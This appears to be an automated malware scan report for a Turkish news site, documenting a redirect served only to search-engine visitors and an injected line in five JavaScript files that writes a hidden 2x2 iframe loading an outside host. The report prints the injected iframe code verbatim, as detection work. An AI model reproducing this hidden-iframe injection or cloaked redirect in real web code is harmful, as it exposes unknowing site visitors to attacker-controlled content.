Malicious/Suspicious Redirects
Request | Server response | Status |
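URL: http://www.kartalgundemi.com/ (request sent with a search-engine Referer, imitating a visitor who arrives from search results) GET / HTTP/1.1 Host: www.kartalgundemi.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 08 Sep 2014 09:26:20 GMT Location: http://q-e.bplaced.net/cacf.html?h=948695 Server: Apache Content-Length: 225 Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: the same URL returned 200 OK in the page scan below (presumably requested without the search-engine Referer), which suggests the redirect is served only to visitors arriving from search results. The 302 is issued by the server itself, so removing the injected line from the script files listed below would not be expected to remove it; the server configuration and server-side code need checking as well.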
Scanned pages/files
Request | Server response | Status |
http://www.kartalgundemi.com/ | 200 OK Content-Length: 57576 Content-Type: text/html | clean |
http://www.kartalgundemi.com/Scripts/jquery142.js | 200 OK Content-Length: 72485 Content-Type: application/javascript | malicious |
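Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
Note: this line writes a 2x2 pixel iframe into the page that loads content from q-e.bplaced.net, the same host and page as the redirect target above, with the same numeric value (j=948695 here, h=948695 in the redirect). The identical line is reported in every script flagged in this scan. The excerpt that follows is from the rest of the file.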
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> | ||
http://www.kartalgundemi.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8187 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> | ||
http://www.kartalgundemi.com/Scripts/swfobject.js | 200 OK Content-Length: 10379 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElemen Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> | ||
http://jqueryui.com/jquery-1.7.1.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://jqueryui.com/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://www.kartalgundemi.com/Scripts/homev1.js | 200 OK Content-Length: 6138 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
 var crslPluses; var admmnu=0; $.timer(3500, function (timer) { if( crslPluses!='crslPlus-v3' ){$('.crslPlus-v3 .crslPlus-next').click();} if( crslPluses!='headline-box-wrap' ){$('#headline-box .crslPlus-next').click();} }); $.timer(2500, function (timer) { var C = $(".crslPlus } function login_validator(theForm) { if(document.getElementById('mailgir').value == "E-Posta Adresiniz" || document.getElementById('mailgir').value == "" || document.getElementById('sifregir').value == "") { alert("Lütfen Mail Adresinizi ve Åifrenizi Giriniz..."); document.getElementById('mailgir').focus(); return(false); } return (true); } function MM_openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> | ||
http://www.kartalgundemi.com/Scripts/bookmark.js | 200 OK Content-Length: 3832 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
<!-- function Social_Load() { var d=document; if(d.images){ if(!d.Social) d.Social=new Array(); var i,j=d.Social.length,a=Social_Load.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.Social[j]=new Image; d.Social[j++].src=a[i];}} } function schnupp(n, d) { var p,i,x Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> |
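Safe Browsing / Blacklists
Note: neither service listed the site at scan time. This does not contradict the findings above: blacklist entries can lag behind a compromise, and the Yandex result itself allows that malware details may not be published yet.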
Query: http://www.google.com/safebrowsing/diagnostic?site=kartalgundemi.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kartalgundemi.com/
Result: kartalgundemi.com is not infected or malware details are not published yet.
Result: kartalgundemi.com is not infected or malware details are not published yet.